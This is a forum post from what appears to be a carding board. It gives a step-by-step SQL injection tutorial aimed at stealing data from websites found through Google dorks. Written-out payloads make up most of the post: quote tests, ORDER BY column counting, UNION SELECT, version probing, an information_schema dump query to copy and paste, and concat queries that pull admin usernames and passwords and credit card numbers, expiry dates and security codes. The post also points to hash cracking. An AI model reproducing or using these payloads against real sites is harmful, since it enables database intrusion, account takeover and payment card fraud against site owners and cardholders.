Go Back   The Pirate Ship > English speaking Carders > Hacking & Phreaking

Thread Tools Display Modes
Old 01-10-2018, 07:29 AM   #1
Super Moderator
Mark_Lataev's Avatar
Join Date: Dec 2017
Post: 37
Exclamation Full SQL Injection Tutorial

In this tutorial i will describe how SQL injection works and how to
use it to get some useful information.

0. First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(shortly).

1. What do I need?
Mozilla firefox (any other browser goes aswell but they translate every special character(',";+-) you type in the adress-bar into unreadable code)
Balls, there is no easy way, no skipping, only the hard way and this means you will have to try some stuff yourself and maybe need to research some basics about SQL(this is a rather easy language).
Brains, you can always ask questions but think before you ask.

2. Finding a vulnerable site...

This might be the crappiest part of the story but once you find one; you're good to go. I always use google dorks to find vulnerable sites. I have a very good list and I will mail it to you; if you need it.(leave your email in comment section dont PM me)

So go to and enter something like this: inurl:news.php?id= hit ENTER
and you will find a bunch of sites, select 1 and check if it is vulnerable.

3. SQL Injection (classic or error based or whatever you call it)

I. Check for vulnerability

Let's say that we have some site like this

Now to test if it is vulrnable: we add to the end of url ' (quote),

and that would be:'

So if we get some error like:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar..

that means it is vulrnable to SQL injection!

II. Find the number of columns

To find number of columns we use this statement: ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.' order by 1/* <-- no error

NOTE: if /* is not working or you get some error, then try: --' order by 2/* <-- no error' order by 3/* <-- no error' order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

III. Check for UNION function

With union we can select more data in one sql statement.

so we have something like this:' union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, for example: 1 or 2 or 3 then the UNION works. The numbers that are displayed are the vulnerable column numbers. We are going to inject there, but first...

IV. Check for MySQL version

Lets say that we have the number 2 on the screen(which means column nr. 2 is vulnerable), now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or something similar.

it should look like this:' union all select 1,@@version,3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

then we need to convert it with this: convert() function

i.e.' union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.' union all select 1,unhex(hex(@@version)),3/*

This way you will get the MySQL version.
V. Getting table and column name

Well, if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) --> follow this section: "MySQL 4 or lower."
for MySQL > 5 versions -->skip this section and go straight to: "MySQL 5 or greater."
MySQL 4 or lower.
The problem with this version is that we must guess some tables and column names in most cases.

common table names are: user/s, admin/s, member/s, cardnumber/s...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd, cardtype, cardname, cardnumber, expirydate, securitycode etc...

i.e would be:' union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that shows us this table name exists(admin))

we know that table admin exists...

Now we need to find a column name of the table name(admin); we keep the from admin/* statement; but we change the vulnerable column (2) to a possible column name: username

like this:' union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

Lets say we get usernames displayed on our screen, examples would be: admin, or superadmin etc...

If we want to know the passwords we need to use the same method. check if column password exists(same method): union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

You can see the password in 2 possible formats on your screen:
in hash(a bunch of characters take make no sense. i.e md5 hash, mysql hash, sha1...)
plain-text(password is directly visible)

It all depends of how the database is set up..

Now, if we want both column names (username + password) displayed on our screen we are going to use a query:

we can use the: concat() function (this joins the strings)

i.e' union all select 1,concat(username,0x3a,password),3 from admin/*

Note: Do you see the 0x3a I put there? Its hex value for : (so 0x3a is hex value for column)

(there is another way for that, char(58), ascii value for : )' union all select 1,concat(username,char(58),password),3 from admin/*

now we get this displayed: username: password on the screen,
admin:admin123 <-- plain text, when you have this, you can login like admin or some superuser.
superadmin:eb45fhhd64fgd41c5d <-- hash string, then you have basicly 2 options:

option 1: there are alot of good hash crackers online which may crack your string give it a try(mostly limited to pre-found hash strings).
option 2: go to this website: and get your own hash cracking tool. there are some good tutorials here on altenen about this and how to use it properly so give it a search.

MySQL 5 or greater.

For this we need information_schema. It holds all tables and columns in database.

To get tables names we use table_name and information_schema.tables.

i.e' union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the all table names on the screen. You will see it doesnt look so pretty and not organized so I prefer using a query script(DONT edit this; just COPY & PASTE):

(SELECT(@x)from(select(@x:=0x00),(SELECT(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2f,table_name, 0x2f,column_name))))x)

All credits for this query goes to: Expired Brain. You can check out his visual tutorial to get an idea of what it looks like:

i.e' union all select 1,
(SELECT(@x)from(select(@x:=0x00),(SELECT(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2f,table_name, 0x2f,column_name))))x),3*/

You will get something like this: database_name/table_name/column_name
(the whole database directory is visible)

Choose a table name that looks interesting like: creditcards
Choose the colum names that you want to know of creditcards for example: CardNumber, ExpiryDate and SecurityNumber.

To get these column names in one page we are going to use another query, to put them all together.

for that we use concat() , or group_concat().

i.e' union all select 1,concat(CardNumber,0x3a,ExpiryDate,0x3a,SecurityN um ber) from creditcards/*

what we get here is CardNumber: ExpiryDate: SecurityNumber from the table creditcards.

example: 1161094121611:10/18:666
There you have it, full control of the database

That's all in this part, if people are interested I will start another tutorial about Blind SQL Injection!

Good luck all!
Always your Mark
Mark_Lataev is online now   Reply With Quote

carding, hacking, prtship, sql, tutorial

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump